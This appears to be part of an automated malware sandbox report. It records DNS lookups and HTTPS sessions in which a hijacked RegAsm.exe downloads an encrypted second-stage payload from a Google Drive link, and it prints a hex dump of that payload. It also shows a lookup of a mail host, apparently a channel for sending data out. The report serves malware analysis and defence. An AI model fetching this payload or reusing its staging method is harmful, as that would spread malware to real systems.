                                                                      Oct 13, 2021 18:06:30.711040974 CEST192.168.11.201.1.1.10x3af5Standard query (0)doc-0g-7s-docs.googleusercontent.comA (IP address)IN (0x0001)
                                                                      Oct 13, 2021 18:08:06.955739021 CEST192.168.11.201.1.1.10x61bfStandard query (0)mail.tccinfaes.comA (IP address)IN (0x0001)
                                                                      Oct 13, 2021 18:08:14.191606045 CEST192.168.11.201.1.1.10x1c38Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                      Oct 13, 2021 18:06:29.899198055 CEST1.1.1.1192.168.11.200xb7c6No error (0)drive.google.com172.217.168.46A (IP address)IN (0x0001)
                                                                      Oct 13, 2021 18:06:30.756206989 CEST1.1.1.1192.168.11.200x3af5No error (0)doc-0g-7s-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                                                      Oct 13, 2021 18:06:30.756206989 CEST1.1.1.1192.168.11.200x3af5No error (0)googlehosted.l.googleusercontent.com142.250.186.33A (IP address)IN (0x0001)
                                                                      Oct 13, 2021 18:08:07.063858986 CEST1.1.1.1192.168.11.200x61bfNo error (0)mail.tccinfaes.comtccinfaes.comCNAME (Canonical name)IN (0x0001)
                                                                      Oct 13, 2021 18:08:07.063858986 CEST1.1.1.1192.168.11.200x61bfNo error (0)tccinfaes.com188.93.227.195A (IP address)IN (0x0001)
                                                                      Oct 13, 2021 18:08:14.209172964 CEST1.1.1.1192.168.11.200x1c38No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)

                                                                      HTTP Request Dependency Graph

                                                                      • drive.google.com
                                                                      • doc-0g-7s-docs.googleusercontent.com

                                                                      HTTPS Proxied Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      0192.168.11.2049795172.217.168.46443C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      2021-10-13 16:06:30 UTC0OUTGET /uc?export=download&id=1YskFLBi29LIb1vUTRMsrhrkgjF8NUmBX HTTP/1.1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                      Host: drive.google.com
                                                                      Cache-Control: no-cache
                                                                      2021-10-13 16:06:30 UTC0INHTTP/1.1 302 Moved Temporarily
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                      Pragma: no-cache
                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                      Date: Wed, 13 Oct 2021 16:06:30 GMT
                                                                      Location: https://doc-0g-7s-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ci1bu5biaf70slhogar9caibgbbnhqpn/1634141175000/01707528263340534167/*/1YskFLBi29LIb1vUTRMsrhrkgjF8NUmBX?e=download
                                                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                      Content-Security-Policy: script-src 'nonce-XKfglME4N2VKR7AWWBWHrA' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                                                      X-Content-Type-Options: nosniff
                                                                      X-Frame-Options: SAMEORIGIN
                                                                      X-XSS-Protection: 1; mode=block
                                                                      Server: GSE
                                                                      Set-Cookie: NID=511=f990YDA9g27htV9j7SYPDv4UEQWnaqf4UVRadHOytcH6a4zwpLOJJdKE0-r6ZDAuAV52ihV1M19fYJyMWvBsByM8CgIrYLh0SH-oYRiPeF6xLdGrXyv8mxM1TxClzvCjhFxHX8cYPy_xYYs34FLEBtzn0C2MatdvVlumnf8ZSlM; expires=Thu, 14-Apr-2022 16:06:30 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                      Accept-Ranges: none
                                                                      Vary: Accept-Encoding
                                                                      Connection: close
                                                                      Transfer-Encoding: chunked
                                                                      2021-10-13 16:06:30 UTC1INData Raw: 31 38 34 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 30 67 2d 37 73 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 6f 63 73 2f 73 65 63 75 72 65 73 63 2f 68 61 30 72 6f 39 33 37 67 63 75 63 37 6c 37 64 65 66 66 6b 73 75 6c 68 67 35 68 37 6d 62 70 31 2f 63 69 31 62
                                                                      Data Ascii: 184<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-0g-7s-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ci1b
                                                                      2021-10-13 16:06:30 UTC1INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      1192.168.11.2049796142.250.186.33443C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      2021-10-13 16:06:30 UTC1OUTGET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ci1bu5biaf70slhogar9caibgbbnhqpn/1634141175000/01707528263340534167/*/1YskFLBi29LIb1vUTRMsrhrkgjF8NUmBX?e=download HTTP/1.1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                      Cache-Control: no-cache
                                                                      Host: doc-0g-7s-docs.googleusercontent.com
                                                                      Connection: Keep-Alive
                                                                      2021-10-13 16:06:31 UTC2INHTTP/1.1 200 OK
                                                                      X-GUploader-UploadID: ADPycdssbEGGT6BVDTaS0x5BRtjp02abIyxvyrpoNZLW5SWJ6Gis2pwzt24olJfkzhtxTs5J5HBDY_VuD0PuRppveQ
                                                                      Access-Control-Allow-Origin: *
                                                                      Access-Control-Allow-Credentials: false
                                                                      Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout
                                                                      Access-Control-Allow-Methods: GET,OPTIONS
                                                                      Content-Type: application/octet-stream
                                                                      Content-Disposition: attachment;filename="KEV-LOG_FPyXvZrhH207.bin";filename*=UTF-8''KEV-LOG_FPyXvZrhH207.bin
                                                                      Content-Length: 221760
                                                                      Date: Wed, 13 Oct 2021 16:06:31 GMT
                                                                      Expires: Wed, 13 Oct 2021 16:06:31 GMT
                                                                      Cache-Control: private, max-age=0
                                                                      X-Goog-Hash: crc32c=aDV6Qw==
                                                                      Server: UploadServer
                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                      Connection: close
                                                                      2021-10-13 16:06:31 UTC5INData Raw: 87 bb e7 f2 7c 26 e0 d8 1f 9a 33 7e 47 d8 3d 5f 57 c1 6d fa 71 42 06 2b 83 86 b0 fa 0a 5d 4a 13 0f b6 9d c7 ee a4 05 1a 07 39 87 78 a1 2e 77 59 8c b2 a1 46 bd fc ef 62 4d 14 55 4f 0b a3 d9 73 e5 c0 37 84 ee 70 96 ab 6e e4 54 84 17 18 1c 1d ee c1 2e 54 a4 c5 88 70 f9 5f af 4c dd de 2d 52 ba 40 2b 65 94 15 d6 3a 08 3a 1d 8f e2 9d b4 09 e9 f3 cf b1 d7 7b 51 46 81 8b 69 fd 30 62 3a a5 95 24 e5 b3 2d 35 44 65 fa 57 c7 da 44 de 29 9e 4c c9 83 c3 fb 6f 46 33 2f 41 af 6a 9a 48 f2 ca fb d5 60 7a 42 3b 26 8b fa fb fd dc 7f 6c a1 0e 9e 7c fa ba 49 b7 d1 97 d1 54 75 34 62 47 a8 99 b5 63 da 9d c1 76 17 c5 8d 9f f6 13 cc 05 42 4d 5b 33 86 d2 2e e2 35 2a 0a 55 e3 a4 85 1c 0d aa 3e ea e0 9c e1 92 0b df 0b 05 00 dc 4f 60 48 11 5b f3 a9 22 9d 09 1b f9 12 ed 76 27 a8 9b 70
                                                                      Data Ascii: |&3~G=_WmqB+]J9x.wYFbMUOs7pnT.Tp_L-R@+e::{QFi0b:$-5DeWD)LoF3/AjH`zB;&l|ITu4bGcvBM[3.5*U>O`H["v'p
                                                                      2021-10-13 16:06:31 UTC9INData Raw: 60 49 89 90 e2 b8 ef c3 a9 27 2a cd 03 fa db 82 ad 82 b3 e6 3a 59 3a e5 d3 83 b9 0e b2 d5 50 ba 34 97 39 20 4a c8 10 a4 ff 42 db 1f b9 ee 52 f4 69 3a 59 57 62 f3 6e 3c 98 b7 64 8f 75 67 6f 85 94 6d ac ad 63 39 2d 87 fe ec 50 3d 6c 60 50 ef 78 44 f2 c9 9b 9c 51 91 b7 d0 56 28 95 3f 16 42 e4 cf 18 d6 52 b7 4a b3 50 78 fb c8 ed d3 7e da ba 01 af ee 52 01 ce 8e f6 a2 23 16 d5 8d be 6e d7 69 77 dd ad 8d 3b e9 78 3c 85 26 14 27 eb 0b a7 27 67 2b 83 78 6a fd 5c 36 58 e4 d8 68 4f c1 ba 00 51 56 ec a4 ed 1a b4 07 0d 23 64 5b f4 eb c5 1f 23 f9 7a ec c4 1a 1e a1 ce 5a 40 86 fe 1e 80 57 bb 3f a7 a1 49 b5 00 2b 2a d2 59 64 48 e9 dc ea 20 55 dc 04 d2 93 17 8f 27 5d fe bf ac 1d 58 a6 21 71 f0 74 cc d2 a6 4f bb bc fb cb 7e 64 e3 09 47 23 b6 8e a3 af df 65 3c 42 28 5d 6f
                                                                      Data Ascii: `I'*:Y:P49 JBRi:YWbn<dugomc9-P=l`PxDQV(?BRJPx~R#niw;x<&''g+xj\6XhOQV#d[#zZ@W?I+*YdH U']X!qtO~dG#e<B(]o
                                                                      2021-10-13 16:06:31 UTC13INData Raw: 40 4e b3 41 e0 ad 22 8c 0d 44 ec ec cc 5a 2c a1 b1 0b 57 83 22 56 49 08 61 e7 bc d4 8b a8 4b 1d 22 d8 78 db 44 88 d8 84 c9 9c b5 b6 f4 be 27 bf 2c ec 82 d3 ed 02 0f f1 a8 f7 f1 20 14 74 f4 3b 6f 1e 80 4a 52 32 90 af 66 0b 91 2b 03 4a ef e1 91 15 ab 87 ff d9 b6 4b 73 c8 8f a5 ca b3 b5 f6 93 d6 5a 2c 8f 52 54 40 a4 6c 5e f8 d8 db 3b a7 f6 3d a1 76 f8 2b c8 60 f2 61 86 26 77 b7 f2 3a 95 e2 16 04 45 0c 2a 4b 69 3a 93 34 42 c9 1b d9 6e a8 75 10 27 b7 92 48 1a c0 9c 86 9e fc b5 57 e2 57 ca b9 0d 7c 8a dd e1 fc 04 2f a4 9b c3 5b 78 3a df 9e 31 7d c5 55 38 99 3c 5d f7 b3 74 51 07 74 ee 70 7a 41 5d 04 01 64 e3 0a dd 2c 84 6c 5f 3e 6c 2b ad a4 56 01 fe 89 5f a4 23 4d 43 36 df 32 de a8 7d c9 49 70 85 fb db 52 40 57 20 8c 83 b9 40 fb 6b 43 39 2e d3 d6 e1 8f e6 e1 d7
                                                                      Data Ascii: @NA"DZ,W"VIaK"xD', t;oJR2f+JKsZ,RT@l^;=v+`a&w:E*Ki:4Bnu'HWW|/[x:1}U8<]tQtpzA]d,l_>l+V_#MC62}IpR@W @kC9.
                                                                      2021-10-13 16:06:31 UTC16INData Raw: e2 5c d4 e6 66 19 0b 91 84 14 b2 21 b6 17 42 2e 4f 48 a3 c8 33 90 df fa 48 32 c3 57 71 9a 94 3a 2e 01 b3 20 5f e8 7e 16 7c 69 ce 6d b5 d1 a6 4b ae e9 00 41 08 3b 35 dc 79 71 de 63 79 1d 7e a6 69 b0 14 6f bf b7 4e 6c 14 0d 25 c2 d6 ee 08 57 f5 0d 30 00 d7 e3 76 b1 40 78 48 fc 77 5a 5f 80 4e cb 01 73 f6 78 c2 07 6c dc 61 2a db f8 a8 9c b4 ac c5 b1 94 ab 6c e8 45 ae fb ee 0d 33 5c d0 03 47 a2 d4 81 1f 70 5f af 46 ca 20 2f 5a d5 89 2b 65 9e 02 28 38 68 3c 72 46 e2 9d be 1e 17 f1 90 a0 d1 14 98 46 81 81 7e 03 b2 3d 03 93 9a 3b 5f c3 23 81 4d ac b7 c7 04 94 89 f9 55 3c 25 ba a9 f3 02 00 21 41 5f 29 a7 62 f9 26 9a 8d 4c f7 02 19 78 c4 46 e5 da 93 80 bc 2a 63 e4 06 37 11 9e d9 6f 92 18 9f f5 52 5d 13 62 47 a2 3b f4 66 cd b5 49 75 14 c3 5c df 83 b6 ce 05 44 65 7c
                                                                      Data Ascii: \f!B.OH3H2Wq:. _~|imKA;5yqcy~ioNl%W0v@xHwZ_Nsxla*lE3\Gp_F /Z+e(8h<rFF~=;_#MU<%!A_)b&LxF*c7oR]bG;fIu\De|
                                                                      2021-10-13 16:06:31 UTC18INData Raw: 03 8e 3f 46 d1 c7 83 ec 65 f4 6f 18 59 79 60 f5 79 31 df 5d 64 8f 75 91 4b 83 be 67 b8 bb 4a 23 2d 87 fa ca f4 07 7b ef 50 c0 50 73 f2 c9 93 8f 35 85 e6 4c 7e 1a 95 3f 1c 9f c1 ce 18 d6 81 14 4a a1 4e 60 bb 55 f6 e3 7b c1 20 15 af ee 46 12 8e 8e b4 9c 42 d9 d7 87 cc ff c6 29 61 a9 bc a5 71 ed 50 73 e8 6d 12 0f b6 0f b0 4e 44 53 83 72 66 7f 6d 38 40 cc ef 27 4f c7 12 17 06 20 8a dd ed 10 b8 0b 7d 5e 69 25 e2 e1 c3 33 47 81 7a ea a1 e8 0f e1 de 74 0e c9 fc 18 24 29 aa 17 dc ab 4f d0 7a 4c 28 d8 54 4b 14 d3 dc ec 30 3d e0 d6 d2 99 35 e9 f5 5f f8 af ac 1d 5a a6 2d 08 c8 ff cc d8 8e 20 d6 e8 fd e3 08 68 e4 6c 37 0d b6 84 12 65 84 e8 17 42 00 6b 62 8b 7f 25 83 de c3 59 1a 7d 5f af e2 c2 13 2e 01 bd 11 32 9e 56 87 6f 45 ec f8 9f d1 a0 5c 96 c6 d0 91 08 3d 17 d3
                                                                      Data Ascii: ?FeoYy`y1]duKgJ#-{PPs5L~?JN`U{ FB)aqPsmNDSrfm8@'O }^i%3Gzt$)OzL(TK0=5_Z- hl7eBkb%Y}_.2VoE\=
                                                                      2021-10-13 16:06:31 UTC19INData Raw: 83 73 54 56 1e 7c e3 bc c5 e6 b9 b5 1c 01 d3 67 c9 d3 9d d8 85 c8 91 ac a5 88 b7 36 bb 3d e2 7c d2 47 06 06 ee af 89 e9 20 0e 70 56 25 60 0d 84 4a d1 3f 8f bd 96 0a bd 26 aa 5c e0 c9 ee 17 ab 81 47 c6 a5 59 77 c8 9e a1 70 44 b4 da 9e c1 49 28 35 4a 50 5f b3 92 5f d4 c0 f0 3e 9e 1e c0 5e 89 36 5c d1 60 e1 65 ae 02 ab be f8 10 89 d2 14 04 57 0d 2a 4a 61 3a 93 25 bf cb 30 c2 60 af 62 ee df 92 90 50 1e c0 9b 90 7a fd 99 54 f5 5c ca be 1d 88 8b f1 ed d7 06 04 51 b9 b6 59 77 3c dd b6 b0 7d c5 5e 10 ef 3e 5d d4 91 ef 51 09 7e f1 7a c5 14 5d 04 0f 4c 78 0a c7 26 9b 67 d3 61 6c 2b ee 86 cd 01 f0 83 77 d3 71 47 45 1e 48 32 de a2 4f b1 4b 71 83 d3 40 52 1c 57 08 a9 8d b9 4a d3 9a 49 39 24 f4 93 e3 8f fa c9 4c 43 88 f5 1d ed fe 2a b5 bf cd bf 1e 65 36 8a d4 80 7d 1e
                                                                      Data Ascii: sTV|g6=|G pV%`J?&\GYwpDI(5JP__>^6\`eW*Ja:%0`bPzT\QYw<}^>]Q~z]Lx&gal+wqGEH2OKq@RWJI9$LC*e6}
                                                                      2021-10-13 16:06:31 UTC20INData Raw: dc 7f 68 e3 78 e1 22 9a 86 3f bd 31 94 e8 bd d7 5a 48 8b 75 31 83 e9 e9 61 86 7d 55 71 bb bc 1d 3f 17 aa 0c 39 6b 7e 10 6f 45 f7 d4 ae 2f a1 76 82 d7 b3 59 1b 39 1d ea 7d 6b 2a 4a 0b 15 46 d2 7a 9e 3c c9 ae b3 48 6c 39 39 1b c1 fa f9 27 1f 98 0d 3a 22 8b 8c 86 b7 53 5f 4c 14 68 49 5d 91 76 e7 48 8f f7 52 ed 29 64 46 60 1e 96 fc a8 8b a3 93 13 71 ba a8 72 f7 50 84 f9 e3 01 e3 57 ed 2b 43 8e db 9b 74 b9 4e ab 54 23 df 01 5b 92 73 2b 65 9e 18 cf 29 0c 3a 0c 8b f4 63 b5 25 ea e4 dc b5 d7 6a 55 58 7f 8a 45 ff 9b 67 02 dd 64 c4 a0 b5 3a 57 41 a0 d2 61 71 a4 25 e9 57 ed 15 be a3 34 8b 00 21 69 4e 2c 9e 21 22 24 9c a3 85 86 dc 1e 62 4f 40 e2 a4 88 93 fc 3f 0f a3 3f f4 6d 85 df 67 be b3 7d f4 54 73 22 9c 46 d6 82 e5 26 de 8b 73 76 74 e9 7d c7 ac 1d 2d 04 42 4b 4a
                                                                      Data Ascii: hx"?1ZHu1a}Uq?9k~oE/vY9}k*JFz<Hl99':"S_LhI]vHR)dF`qrPW+CtNT#[s+e):c%jUXEgd:WAaq%W4!iN,!"$bO@??mg}Ts"F&svt}-BKJ
                                                                      2021-10-13 16:06:31 UTC22INData Raw: 5b c0 27 65 81 1c 44 34 f6 4b 57 b1 4d 1f fb d3 40 58 4a 40 04 a9 8b a6 5b 2d f1 6f 37 23 d3 e8 e3 8f ea 49 44 42 88 f1 02 ff 8b 20 bd a0 d3 41 1f 49 ba 87 cf fe 6b 1e ed e6 4e 0b a5 b7 9c 30 9c 9a 59 a1 ec b2 90 08 cb ba 24 13 20 0b 24 ed e4 f9 84 ba 83 67 45 36 ef 07 4b 4d 07 b2 d1 4f d9 63 9f 26 38 68 e1 12 a4 d4 41 e9 b1 55 39 9a de 72 00 75 79 ab f3 68 36 9a 8f 64 9e 7d 91 90 83 be 67 c3 99 62 11 27 e8 c9 ec 29 37 70 32 e3 e5 78 44 d7 e1 ae 9c 08 9b f9 49 7e dd 95 3f 1c 51 e0 ef 18 d2 ff 1a c7 da 4a 78 fa c4 26 9f 7b da ac 28 bb ee 47 0b e6 9f f5 8a 60 1f 5b 30 12 e5 c4 6c 60 dc ba a1 1e e8 79 36 e0 64 05 22 f3 0c 98 09 2b 2b 85 54 6b ab 10 a8 24 e4 b7 24 67 d5 b0 06 4c 11 a2 a5 ed 1a de 43 17 dd 2b 5b fe 56 d0 31 79 ea 7c f9 a2 59 19 8a ff 7c 68 cf
                                                                      Data Ascii: ['eD4KWM@XJ@[-o7#IDB AIkN0Y$ $gE6KMOc&8hAU9ruyh6d}gb')7p2xDI~?QJx&{(G`[0l`y6d"++Tk$$gLC+[V1y|Y|h
                                                                      2021-10-13 16:06:31 UTC23INData Raw: 2d a3 01 c3 4a 9c a5 8f ee 11 1b 62 58 57 fd 24 93 bf ef 45 01 f2 2e f7 3b 61 df 67 b0 b3 f0 f5 54 7f 3e 7b 54 ac 99 f4 22 c1 63 8c 5b 0f c3 22 d1 aa 72 c6 7b 67 4d 5b 37 8e 48 d8 ca 19 2b 01 5e fe 5a 84 68 24 b6 2d e6 e0 8d e5 8e f5 de 49 76 14 f6 52 53 4c 11 4a f7 bf dc 9c 25 58 ee 01 c9 76 36 ac 84 8e 56 af 2a 76 53 26 1b 1c 43 3a 87 a7 63 10 06 da 56 7f df b7 d8 84 c8 8a 9c a1 f0 3d 31 bb 33 cd 7c d2 d0 27 4e ee a3 8f 69 00 14 70 52 5a 44 0d 84 4e 6f 08 f1 9e 98 0a b9 31 39 4d 9e ec e2 17 af 0f ea d0 94 74 5f 82 9e a1 da 60 b1 07 c3 c6 49 28 a4 5d 2e 7c bc 92 5b cc e9 e6 40 ba 1e c0 5a 07 48 43 e0 6c da 2e ae 02 71 9a fd cd b5 d5 14 04 65 44 2a 4b 67 38 8d 65 bf c2 30 c2 10 a2 62 ee 22 b3 7f 52 11 c6 b3 d0 60 fd 93 66 ec 22 c2 be 15 86 a3 01 e1 d7 00
                                                                      Data Ascii: -JbXW$E.;agT>{T"c["r{gM[7H+^Zh$-IvRSLJ%Xv6V*vS&C:cV=13|'NipRZDNo19Mt_`I(].|[@ZHCl.qeD*Kg8e0b"R`f"
                                                                      2021-10-13 16:06:31 UTC24INData Raw: 71 e9 7c eb 01 6f 14 27 e3 12 c8 7b 32 55 8b 72 6c d9 54 74 5b e4 b1 0d 6b c1 b0 0c c6 31 a2 a4 e9 cd 7f 1a 3f 4c 29 44 8d d2 da 49 67 fb 7a ee 83 47 1d a1 c2 74 4c cb fc 14 06 30 ea 3f a3 76 e0 d8 52 2b 28 c7 28 50 25 ad d4 ea 21 3e a7 0a d1 99 39 e9 01 5d f8 a3 04 3b 58 a6 2f ba 21 fd cc d2 a4 57 af db e2 b5 7c 68 e4 62 37 2c b5 84 12 90 2d e8 17 48 a8 54 62 8b 71 ec e3 db eb 61 18 62 75 42 85 c2 15 2e 01 bd 20 5b ea 7e 16 47 61 e6 d0 bd 51 a8 5a 87 c5 62 16 0a 3d 1d d3 7d 71 d4 4d 48 14 7f a0 70 f1 37 d3 bd bd 60 79 3d 25 e3 af df e9 20 7a 9a 07 3b 28 83 f5 88 b6 0c 57 7f 53 8b 5b 4f 6f 66 bc 51 51 52 7e ea 20 92 dd 7d fc 84 a7 aa ba 02 84 ed 70 68 aa 7c 1a 55 db c4 8d 1e 91 29 c1 2e 55 cb c9 89 70 b3 30 a8 4d dd d4 05 42 b9 40 2d 0a 09 15 d6 30 24 2f
                                                                      Data Ascii: q|o'{2UrlTt[k1?L)DIgzGtL0?vR+((P%!>9];X/!W|hb7,-HTbqabuB. [~GaQZb=}qMHp7`y=% z;(WS[OofQQR~ }ph|U).Up0MB@-0$/
                                                                      2021-10-13 16:06:31 UTC25INData Raw: e6 db 57 d1 66 ed 5e bd 19 77 a6 e3 0f a4 2c 15 28 43 0f 3b 40 49 2b 92 25 5e d1 34 dd 4d bc 79 ee 37 80 87 ae 10 ec 98 88 73 e6 99 44 ee 43 d9 40 14 ae 81 e0 e8 cd d0 17 4c ac a2 4a 63 3c cc ad b5 69 3b 5e 3c e2 3c 4c fa b3 fd 50 07 74 fd 65 e3 0d 46 04 11 57 67 1a 23 27 b7 68 d1 70 67 03 be 8d cd 0b ed 95 68 c2 32 56 45 0f 5f 2d f7 5c 54 9d 40 61 88 c2 55 84 53 56 17 83 90 a2 4a c2 eb 5c 18 da fa bf e8 9e eb d8 42 94 9b fe 02 cf 94 3b b5 ae d8 a0 28 9b b0 ac dd b8 ff 1e ed e2 f3 23 a7 a0 9c 29 9c 7b 75 73 fe 98 b3 fe c2 ab 3a ed db 02 3b c5 98 9a 84 ab 92 72 7c c4 ee 23 56 a2 0d 8f d7 8e c6 68 88 1f 39 8d e0 2f bd e0 74 2f c0 87 d7 74 f2 7e ea 66 af ed d8 68 36 b1 9c 61 90 4e aa 74 83 af 76 b3 b7 9c 10 01 89 fe fd 22 15 6b ee 50 ef 6b 54 ed d2 8a 87 08
                                                                      Data Ascii: Wf^w,(C;@I+%^4My7sDC@LJc<i;^<<LPteFWg#'hpgh2VE_-\T@aUSVJ\B;(#){us:;r|#Vh9/t/t~fh6aNtv"kPkT
                                                                      2021-10-13 16:06:31 UTC27INData Raw: 76 35 40 7e f4 6f e5 08 7d dd 6b 08 96 f6 b9 95 bd 95 e3 a6 40 b8 65 e6 45 8b c0 f6 1d 1d 5c cd 3f 5b be 13 9b 7f bb 4e a0 64 cc df 2d 58 b7 51 24 7f 42 06 d9 38 19 35 35 9e e3 9d be 1a e4 e2 c0 ab c6 76 87 90 92 84 6b ec bf 4a 2b a4 9b 31 4c b8 3c 8e 57 7e c8 e0 d7 93 9e 25 6a 20 a8 91 a3 b3 88 13 25 43 5f 23 9e 0d ed 37 99 8d 99 f4 02 15 61 58 5f 8a c6 93 93 f6 02 0f f3 2e f3 1b be d1 e7 ba dc dd 6a 54 75 34 61 56 a4 f6 f8 27 da 97 e2 69 15 c5 47 fe f9 72 cc 03 51 59 4a 27 97 c2 c6 ca 67 2b 01 52 fb b6 82 28 2d aa 3e e2 e0 9c e1 b2 4b 84 46 73 03 dc 4f 40 48 e1 64 aa 81 b3 9d 09 51 4e 05 1b fb 0c a8 99 71 44 90 39 4f 47 0d 75 8f 9f c5 8f b0 b5 1c 0e f3 27 92 e1 82 d9 84 c2 b9 8c a4 f0 b4 32 93 24 e1 7c d4 ae 16 07 ee a9 a5 fb 31 10 61 45 22 78 25 d5 4a
                                                                      Data Ascii: v5@~o}k@eE\?[Nd-XQ$B855vkJ+1L<W~%j %C_#7aX_.jTu4aV'iGrQYJ'g+R(->KFsO@HdQNqD9OGu'2$|1aE"x%J
